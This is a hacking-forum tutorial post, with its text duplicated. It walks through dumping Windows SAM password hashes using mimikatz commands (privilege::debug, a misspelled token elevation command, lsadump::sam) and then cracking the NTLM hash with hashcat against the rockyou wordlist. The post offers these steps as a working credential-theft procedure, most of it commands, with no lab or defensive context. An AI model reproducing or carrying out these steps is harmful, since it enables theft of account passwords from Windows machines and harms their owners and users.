Teacher
Professional
- Messages
- 2,669
- Reaction score
- 818
- Points
- 113
???????? ?
⛏ ????????????
➤ Linux Machine (Host Machine)
➤ Windows Machine + Escalated Permissions
➤ CMD Access
➤ Password List
️ ?????
First of all we need mimikatz. If you are using Kali Linux you can find mimikatz here:
After we created our zip, upload it somewhere and download it on windows then drag it to desktop.
We also need for cracking the hashcat tool:
Check Architecture
Open cmd and type:
If you have 32bit, go into the the win32 folder, if you have 64bit go into the x64 folder.
Run Mimikatz
Run the mimikatz.exe as Administrator.
For testing the privilege debug we type:
The success response should be:
Privilege '20' OK
Impersonate Token & Dump SAM
To impersonate a token we use following command:
It will print a lot of text like this:
Let's dump the SAM:
The output looks like this:
Note And Crack The Hash
Scroll down. You will see after a bit scrolling the sorted "RID","User" and "Hash NTLM".
I scrolled down until i saw my username and then i copied the hash into a linux text file.
Screenshot:
echo "0cb6948...07973b89537" > password.hash
Now it's time for cracking the hash with hashcat.
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt
-m = mode
1000 = NTLM
If you want, different modes you can either use the hashcat help command or take a look to their wiki:
hashcat.net
Finally if hashcat stops, you can view your cracked password either here :
or by repeating the command with the --show parameter:
⛏ ????????????
➤ Linux Machine (Host Machine)
➤ Windows Machine + Escalated Permissions
➤ CMD Access
➤ Password List
️ ?????First of all we need mimikatz. If you are using Kali Linux you can find mimikatz here:
Code:
/usr/share/windows-resources/mimikatz
xdg-open /usr/share/windows-resources/mimikatz
sudo zip `pwd`/mimikatz.zip -r -1 /usr/share/windows-resources/mimikatzAfter we created our zip, upload it somewhere and download it on windows then drag it to desktop.
We also need for cracking the hashcat tool:
Code:
sudo apt install hashcat -yOpen cmd and type:
Code:
wmic os get osarchitectureIf you have 32bit, go into the the win32 folder, if you have 64bit go into the x64 folder.
Run MimikatzRun the mimikatz.exe as Administrator.
For testing the privilege debug we type:
Code:
privilege::debugThe success response should be:
Privilege '20' OK
Impersonate Token & Dump SAMTo impersonate a token we use following command:
Code:
token::evelateIt will print a lot of text like this:
Let's dump the SAM:
Code:
lsadump::samThe output looks like this:
Note And Crack The HashScroll down. You will see after a bit scrolling the sorted "RID","User" and "Hash NTLM".
I scrolled down until i saw my username and then i copied the hash into a linux text file.
Screenshot:
echo "0cb6948...07973b89537" > password.hash
Now it's time for cracking the hash with hashcat.
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt
-m = mode
1000 = NTLM
If you want, different modes you can either use the hashcat help command or take a look to their wiki:
Code:
hashcat --helpstart [hashcat wiki]
Finally if hashcat stops, you can view your cracked password either here :
or by repeating the command with the --show parameter:
Code:
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt --show
